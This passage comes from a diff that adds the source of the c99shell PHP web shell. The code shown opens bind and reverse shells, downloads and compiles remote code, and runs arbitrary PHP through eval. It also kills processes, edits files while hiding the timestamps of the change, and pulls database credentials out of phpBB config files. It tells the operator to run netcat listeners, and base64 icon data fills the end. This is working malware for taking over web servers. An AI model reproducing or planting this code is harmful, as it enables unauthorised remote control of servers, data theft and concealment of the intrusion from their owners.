myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; + } + } + } + if (!empty($dpsubmit)) + { + echo "<b>Result of datapipe-running:</b><br>"; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";} + } + echo "<br>"; + } + } + ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php + foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";} + ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form> +<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php +foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form> +Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br> +<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php +foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php +} +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), + array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), + array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), + array("Code","code"), + array("Session","phpsess"), + array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), + array("SDB","sdb"), + array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), + array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), + array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), + array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), + array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 